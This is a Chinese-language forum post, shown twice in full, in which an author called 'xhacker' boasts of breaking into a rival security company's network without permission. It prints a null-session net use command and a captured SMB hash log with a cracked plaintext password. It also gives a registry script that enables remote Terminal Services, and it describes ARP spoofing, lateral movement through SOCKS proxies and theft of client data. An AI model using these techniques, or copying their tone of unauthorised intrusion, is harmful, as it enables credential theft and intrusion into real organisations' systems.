收获的日子 (原创作者:xhacker)
攻击难度:高
防护难度:高
流行度:1(共0~10个档)
一家安全公司的管理员向我挑衅,嘲笑着提出要求让我来入侵他们的网络并且不能让他知道,言语中很明显贬低别人。我很愤怒地接受了这个挑战!首先我要进行了一系列的踩点(在此前我已经试图过攻破他们的网站但没有成功),我通过简单地引诱他访问我的论坛获取了对他们公司网关的IP地址222.222.222.222(当然如果他是用代理浏览我的论坛就不是网关IP了)。先简单tracert一下查看他的边界路由器,如果边界路由有问题的话就可以利用另一台主机对目标所有的数据包进行sniffer了,我试了几个漏洞确定他们的边界路由没有问题。接下来我对他们网关IP进行了一次漫长的1-65535端口扫描,最后扫描结果报告并没有发现任何开放的端口!这让我感到一丝的沮丧,我测试了一下发现网关的设置可能是:高级TCP/IP设置里的tcp/ip筛选的设置为“全部允许",其中没有允许任何端口。于是我利用了win2k的一个后门(应该是后门而非编程缺陷)简单地突破了它。突破的那一刻真是情绪高涨!!!
接下来我尝试进行空连接:
net use //222.222.222.222 “” /user:””
命令成功完成。
然后我用基于smb协议的ipc破解程序(N年前的老东东)进行快速破解,在每秒10个口令猜测的速度下2000多个单词的字典很快被我用完了,我又换了几个常见的黑客字典以及人为的猜测,但均以失败告终。于是,我计划了一个诡计:利用文件与他的主机生成一个有效的session,然后再(假设称为s主机)截获smb密码散例!
接下来我更改了我主页上的首页内容,使之于主页浏览者能产生一个session。然后告诉那个自以为是的安全工程师:“我的主页上更新了几篇好文章,其中有一篇文章里有我公布的一些网络安全秘技。”于是他很快地登录了我的主页,并且的确看到一些我写的不错的文章。而此时,再看我的s主机的结果:
Using relay adapter index 1: MS TCP Loopback interface
Bound to port 139 on address 111.111.111.111
Connection from 222.222.222.222:4903
Request type: Session Request 72 bytes
Source name: CA-TK3DWGLANN6Q <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to 'CDC4EVER'...
Response: Positive Session Response 4 bytes
Request type: Session Message 137 bytes
SMB_COM_NEGOTIATE
Response: Session Message 133 bytes
Challenge (8 bytes): 469FCF5D88A74025
Request type: Session Message 206 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 1 0
Username: ""
Domain: ""
OS: ""
Lanman type: ""
???: ""
Response: Session Message 154 bytes
OS: "Windows 5.0"
Lanman type: "Windows 2000 LAN Manager"
Domain: "WORKGROUP"
Request type: Session Message 122 bytes
SMB_COM_TRANSACTION2
Response: Session Message 39 bytes
Request type: Session Message 314 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: 21132811E59C4353D2D70C40F4142DC3A6657F339C450556
Case sensitive password: C386CD3E92BF980FCE482313371B6B2EDA24E94CDBBAF9D5
Username: "Administrator"
Domain: "CA-TK3DWGLANN6Q"
OS: "Windows 2000 2195"
Lanman type: "Windows 2000 5.0"
???: ""
Response: Session Message 154 bytes
OS: "Windows 5.0"
Lanman type: "Windows 2000 LAN Manager"
Domain: "WORKGROUP"
我成功地取得了对方的smb密码散列值:)下面就用lc导入这个散列值进行破解了。接下来我花了几个小时,最终得取了明文密码sebqdspo
然后我很幸运地发现,他的网关上也有一个他的账号helin(从这估计他名字叫X鹤林),接下来我用他的账号登录了网关。然后win2k的本地机构缺陷直接从网关的注册表里获取了win2k服务用户的明文密码!然后用这些密码尝试登录他的内网所有winnt/2k主机,一共有7台可以进入,于是我在他们内网的这几台主机安装了最新的sock代理跳板,这样我利用sockscap32里的scanner扫描192.168.0.1-192.168.0.254就不是扫的我的内网而是他的内网,我分别在获取最高权限的13台win2k主机上写入了一个reg脚本:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService]
"Start"=dword:00000002
[HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle]
"Hotkey"="1"
最后终于得到其中4台的3389终端肉鸡(因为有许多都是win2k个人版),这也是当时没太注意的原因。接下来我随便连接一个192.168.0.3 ,哈哈,我直接登录到了他们公司内网的192.168.0.3这台机的3389终端
最后我在QQ上告诉了他所在的工程部门的几台主机硬盘资料,他几乎都不出声了!随后就看到他立即下了线,我想当时给他的震动是相当大的吧。第二天我再尝试登录他们的网关(动态拨号的IP由端口代理所获)发现登录不进去了,我估计网关的系统都被重装了!呵呵,不过我还是可以进入他们内网的3台主机并且后来还发现工程部的主机大部分都经过重装系统,但这已经足够足够了接下来我设了一个smb虚假服务器,并且结合上arp欺骗又搞到了网关的密码,但是只有他们向网关上更新东西或者要使用的时候才会临时开一下server服务,但我还是在他们登录网关的时候在通信中插入了我的指令,这样,就在他们登录网关的时候我的恶意指令也跟随进去了,很快又重新控制了网关(其实控制不控制网关真的无所谓了,因为网关上面没什么重要的东东,真正重要的全部是在他们的办公电脑上)。第三天,我已经逐渐失去了当时的兴奋感了,决定再给他们开一次玩笑吧,接下来我就把他们公司的研发部的主打安全产品的几张风险评估扫描器截图以及工程文档,客户资料全部粘贴到了他们win2000的桌面上(推测:他们每个部门都有独立的ADSL拨号网关,我只是切入了工程部并发现在其中一位员工电脑里有软件研发部发过来的扫描器测试版,当然这位员工可能是新来的所以只负责测试软件的工作,后来的判断果然没错,我在这位员工的电脑上获得了大量的测试产品),接下来他们的表情也许是我们都无法想象的吧。
注:以上的这位黑客已被招安,这只是他以前成长经历中的一件不大不小的事例罢了。
攻击难度:高
防护难度:高
流行度:1(共0~10个档)
一家安全公司的管理员向我挑衅,嘲笑着提出要求让我来入侵他们的网络并且不能让他知道,言语中很明显贬低别人。我很愤怒地接受了这个挑战!首先我要进行了一系列的踩点(在此前我已经试图过攻破他们的网站但没有成功),我通过简单地引诱他访问我的论坛获取了对他们公司网关的IP地址222.222.222.222(当然如果他是用代理浏览我的论坛就不是网关IP了)。先简单tracert一下查看他的边界路由器,如果边界路由有问题的话就可以利用另一台主机对目标所有的数据包进行sniffer了,我试了几个漏洞确定他们的边界路由没有问题。接下来我对他们网关IP进行了一次漫长的1-65535端口扫描,最后扫描结果报告并没有发现任何开放的端口!这让我感到一丝的沮丧,我测试了一下发现网关的设置可能是:高级TCP/IP设置里的tcp/ip筛选的设置为“全部允许",其中没有允许任何端口。于是我利用了win2k的一个后门(应该是后门而非编程缺陷)简单地突破了它。突破的那一刻真是情绪高涨!!!
接下来我尝试进行空连接:
net use //222.222.222.222 “” /user:””
命令成功完成。
然后我用基于smb协议的ipc破解程序(N年前的老东东)进行快速破解,在每秒10个口令猜测的速度下2000多个单词的字典很快被我用完了,我又换了几个常见的黑客字典以及人为的猜测,但均以失败告终。于是,我计划了一个诡计:利用文件与他的主机生成一个有效的session,然后再(假设称为s主机)截获smb密码散例!
接下来我更改了我主页上的首页内容,使之于主页浏览者能产生一个session。然后告诉那个自以为是的安全工程师:“我的主页上更新了几篇好文章,其中有一篇文章里有我公布的一些网络安全秘技。”于是他很快地登录了我的主页,并且的确看到一些我写的不错的文章。而此时,再看我的s主机的结果:
Using relay adapter index 1: MS TCP Loopback interface
Bound to port 139 on address 111.111.111.111
Connection from 222.222.222.222:4903
Request type: Session Request 72 bytes
Source name: CA-TK3DWGLANN6Q <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to 'CDC4EVER'...
Response: Positive Session Response 4 bytes
Request type: Session Message 137 bytes
SMB_COM_NEGOTIATE
Response: Session Message 133 bytes
Challenge (8 bytes): 469FCF5D88A74025
Request type: Session Message 206 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 1 0
Username: ""
Domain: ""
OS: ""
Lanman type: ""
???: ""
Response: Session Message 154 bytes
OS: "Windows 5.0"
Lanman type: "Windows 2000 LAN Manager"
Domain: "WORKGROUP"
Request type: Session Message 122 bytes
SMB_COM_TRANSACTION2
Response: Session Message 39 bytes
Request type: Session Message 314 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: 21132811E59C4353D2D70C40F4142DC3A6657F339C450556
Case sensitive password: C386CD3E92BF980FCE482313371B6B2EDA24E94CDBBAF9D5
Username: "Administrator"
Domain: "CA-TK3DWGLANN6Q"
OS: "Windows 2000 2195"
Lanman type: "Windows 2000 5.0"
???: ""
Response: Session Message 154 bytes
OS: "Windows 5.0"
Lanman type: "Windows 2000 LAN Manager"
Domain: "WORKGROUP"
我成功地取得了对方的smb密码散列值:)下面就用lc导入这个散列值进行破解了。接下来我花了几个小时,最终得取了明文密码sebqdspo
然后我很幸运地发现,他的网关上也有一个他的账号helin(从这估计他名字叫X鹤林),接下来我用他的账号登录了网关。然后win2k的本地机构缺陷直接从网关的注册表里获取了win2k服务用户的明文密码!然后用这些密码尝试登录他的内网所有winnt/2k主机,一共有7台可以进入,于是我在他们内网的这几台主机安装了最新的sock代理跳板,这样我利用sockscap32里的scanner扫描192.168.0.1-192.168.0.254就不是扫的我的内网而是他的内网,我分别在获取最高权限的13台win2k主机上写入了一个reg脚本:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService]
"Start"=dword:00000002
[HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle]
"Hotkey"="1"
最后终于得到其中4台的3389终端肉鸡(因为有许多都是win2k个人版),这也是当时没太注意的原因。接下来我随便连接一个192.168.0.3 ,哈哈,我直接登录到了他们公司内网的192.168.0.3这台机的3389终端
最后我在QQ上告诉了他所在的工程部门的几台主机硬盘资料,他几乎都不出声了!随后就看到他立即下了线,我想当时给他的震动是相当大的吧。第二天我再尝试登录他们的网关(动态拨号的IP由端口代理所获)发现登录不进去了,我估计网关的系统都被重装了!呵呵,不过我还是可以进入他们内网的3台主机并且后来还发现工程部的主机大部分都经过重装系统,但这已经足够足够了
接下来我设了一个smb虚假服务器,并且结合上arp欺骗又搞到了网关的密码,但是只有他们向网关上更新东西或者要使用的时候才会临时开一下server服务,但我还是在他们登录网关的时候在通信中插入了我的指令,这样,就在他们登录网关的时候我的恶意指令也跟随进去了,很快又重新控制了网关(其实控制不控制网关真的无所谓了,因为网关上面没什么重要的东东,真正重要的全部是在他们的办公电脑上)。第三天,我已经逐渐失去了当时的兴奋感了,决定再给他们开一次玩笑吧,接下来我就把他们公司的研发部的主打安全产品的几张风险评估扫描器截图以及工程文档,客户资料全部粘贴到了他们win2000的桌面上(推测:他们每个部门都有独立的ADSL拨号网关,我只是切入了工程部并发现在其中一位员工电脑里有软件研发部发过来的扫描器测试版,当然这位员工可能是新来的所以只负责测试软件的工作,后来的判断果然没错,我在这位员工的电脑上获得了大量的测试产品),接下来他们的表情也许是我们都无法想象的吧。
注:以上的这位黑客已被招安,这只是他以前成长经历中的一件不大不小的事例罢了。
97
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
